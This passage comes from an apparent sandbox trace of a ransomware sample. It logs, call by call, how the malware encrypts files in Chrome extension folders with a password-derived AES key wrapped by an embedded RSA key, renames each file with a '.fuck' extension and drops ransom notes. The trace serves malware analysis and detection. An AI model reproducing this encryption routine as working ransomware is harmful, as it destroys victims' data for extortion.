data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.fuck")) returned 1 [0253.679] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.679] CryptDestroyKey (hKey=0x2984be0) returned 1 [0253.679] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.679] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.680] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.680] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\readme_back_files.htm")) returned 0xffffffff [0253.680] AreFileApisANSI () returned 1 [0253.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.680] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.681] GetFileType (hFile=0x5d50) returned 0x1 [0253.681] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.684] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.684] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.685] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.685] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.685] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.685] GetLastError () returned 0x0 [0253.685] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json")) returned 0x20 [0253.686] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json", dwFileAttributes=0x80) returned 1 [0253.686] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.687] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.688] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.688] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.690] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.690] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.690] CryptHashData (hHash=0x29846a0, pbData=0x28cb710, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.690] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.691] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.691] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.691] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2987868) returned 1 [0253.691] CryptImportPublicKeyInfo (in: hCryptProv=0x2987868, dwCertEncodingType=0x1, pInfo=0x298e5a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298e5d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298e5d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29850a0) returned 1 [0253.691] CryptEncrypt (in: hKey=0x29850a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.691] CryptEncrypt (in: hKey=0x29850a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2987180*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2987180*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.692] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2987180*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2987180*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.693] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xfe, lpOverlapped=0x0) returned 1 [0253.694] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xfe, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0253.694] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0253.694] CloseHandle (hObject=0x5d60) returned 1 [0253.694] CloseHandle (hObject=0x5d5c) returned 1 [0253.694] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json"), bFailIfExists=0) returned 1 [0253.698] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json", dwFileAttributes=0x0) returned 1 [0253.700] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.gsg")) returned 1 [0253.702] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\messages.json.fuck")) returned 1 [0253.703] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.703] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.703] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.703] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.703] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.703] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\readme_back_files.htm")) returned 0xffffffff [0253.704] AreFileApisANSI () returned 1 [0253.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.704] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\uk\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.704] GetFileType (hFile=0x5d50) returned 0x1 [0253.705] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.706] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.706] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.706] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.706] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.706] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.706] GetLastError () returned 0x0 [0253.706] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json")) returned 0x20 [0253.707] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json", dwFileAttributes=0x80) returned 1 [0253.707] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.708] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.709] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.709] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.712] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.712] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.712] CryptHashData (hHash=0x29846a0, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.712] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984be0) returned 1 [0253.712] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.712] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.712] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x29870f8) returned 1 [0253.713] CryptImportPublicKeyInfo (in: hCryptProv=0x29870f8, dwCertEncodingType=0x1, pInfo=0x298f100*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298f130*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298f138*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985020) returned 1 [0253.713] CryptEncrypt (in: hKey=0x2985020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.713] CryptEncrypt (in: hKey=0x2985020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29880e8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x29880e8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.714] WriteFile (in: hFile=0x5d60, lpBuffer=0x29880e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x29880e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.715] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe3, lpOverlapped=0x0) returned 1 [0253.716] CryptEncrypt (in: hKey=0x2984be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0253.716] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0253.716] CloseHandle (hObject=0x5d5c) returned 1 [0253.717] CloseHandle (hObject=0x5d60) returned 1 [0253.717] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json"), bFailIfExists=0) returned 1 [0253.721] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json", dwFileAttributes=0x0) returned 1 [0253.722] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.gsg")) returned 1 [0253.723] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\messages.json.fuck")) returned 1 [0253.725] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.725] CryptDestroyKey (hKey=0x2984be0) returned 1 [0253.725] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.725] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.725] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.725] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\readme_back_files.htm")) returned 0xffffffff [0253.725] AreFileApisANSI () returned 1 [0253.725] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.725] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\vi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.726] GetFileType (hFile=0x5d50) returned 0x1 [0253.727] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.728] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.728] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29384f8 [0253.728] FindNextFileA (in: hFindFile=0x29384f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.729] FindNextFileA (in: hFindFile=0x29384f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.729] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.729] GetLastError () returned 0x0 [0253.729] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_cn\\messages.json")) returned 0x20 [0253.729] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\zh_CN\\messages.json", dwFileAttributes=0x80) returned 1 [0253.730] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 